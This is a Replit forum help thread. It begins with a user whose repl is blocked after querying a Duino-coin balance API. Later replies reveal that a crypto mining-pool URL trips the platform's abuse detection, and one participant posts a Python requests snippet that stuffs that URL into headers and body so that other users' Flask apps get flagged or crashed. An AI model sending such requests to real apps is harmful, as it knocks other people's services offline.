Requests getting blocked

UNIOINU · March 18, 2023, 3:38pm

ducoUsername = “revox”
requests.get(“https://server.duinocoin.com/balances/{}”.format(ducoUsername))
So I have this code the output should be:
{“result”:{“balance”:5808222.08661312,“created”:“before 23.08.2021”,“last_login”:1679130735,“stake_amount”:0,“stake_date”:0,“username”:“revox”,“verified”:“yes”,“verified_by”:“revox”,“verified_date”:1654803009,“warnings”:0},“server”:“duino-master-1”,“success”:true}
But instead it says:

You can’t run this Repl right now.

It may be temporarily unavailable or it may have violated our Terms of Service.If you are the owner of this Repl and believe you should be able to run it, you can try again later or contact support.

I checked the terms of service and the closest thing that it said is mining crypto. I am not doing that I am just checking the balance of someone who has crypto. Anyone know how to fix it so I don’t keep getting my repl available?

JayAySeaOhBee14 · March 18, 2023, 3:42pm

Welcome to the community, @UNIOINU! Can you send me the link to your repl please?

UNIOINU · March 18, 2023, 4:37pm

Sorry for the late reply.
https://replit.com/@UNIOINU/LustrousWickedOctagon

UNIOINU · March 18, 2023, 5:01pm

But why and how will I get around it?

bigminiboss · March 18, 2023, 5:02pm

You can’t requesting that server is going to crash it because of how replit works

MiloCat · March 18, 2023, 7:07pm

Not only that lol, you can also put

stratum+tcp://pool.bitcoin.com:3333

Literally anywhere in the repl, it just needs to be somewhere where it is processed by goval

bigminiboss · March 18, 2023, 7:32pm

wait did you ask Luis or smth?

Sky · March 18, 2023, 9:25pm

Luis’s code was reversed and someone leaked the src lol, it was pretty basic code obfuscation though.

bigminiboss · March 18, 2023, 9:37pm

Hold up, so for flask repls, how would someone “inject” that, they send it via headers, json, data? Into the url?

PikachuB2005 · March 19, 2023, 12:38am

Hey, I’ve seen this one!

bigminiboss · March 19, 2023, 2:01am

lol yeah, apparently sending it in the headers or smth will crash a flask app xD

JayAySeaOhBee14 · March 19, 2023, 2:06am

i dont understand tho, how would you eve do that?

bigminiboss · March 19, 2023, 2:09am

like literally my guy

from requests import get

get("url", data=("stratum+tcp://pool.bitcoin.com:3333",), json={"stratum+tcp://pool.bitcoin.com:3333": "stratum+tcp://pool.bitcoin.com:3333"}, headers = {    "X-Requested-With": "stratum+tcp://pool.bitcoin.com:3333",
    "Origin": "stratum+tcp://pool.bitcoin.com:3333",
    "Accept": "application/json",
    "Referrer": "https://replit.com",
    "Content-Type": "application/json",
    "Connection": "keep-alive",
    "Host": "stratum+tcp://pool.bitcoin.com:3333",
    "x-requested-with": "XMLHttpRequest",
    "User-Agent": "Mozilla/5.0"})

PikachuB2005 · March 19, 2023, 3:01am

Wait a minute
didn’t you say you wouldn’t share this with anyone

Sky · March 19, 2023, 3:04am

If they not sharing it, they abusing it.

PikachuB2005 · March 19, 2023, 3:06am

How would you be abusing it by stopping other people from abusing it? That makes no sense.

Sky · March 19, 2023, 3:07am

You misunderstood, I simply mean’t knowing @bigminiboss they probably abused it at some point.

bigminiboss · March 19, 2023, 3:43am

because it was related to the post, they tried pinging duicoin

bigminiboss · March 19, 2023, 3:43am

pppffff no way I would ever abuse something

bigminiboss · March 19, 2023, 3:47am

Ok I’m sorry -_- I just thought it was ok since apparently other methods have been leaked and this person already had the fact in their post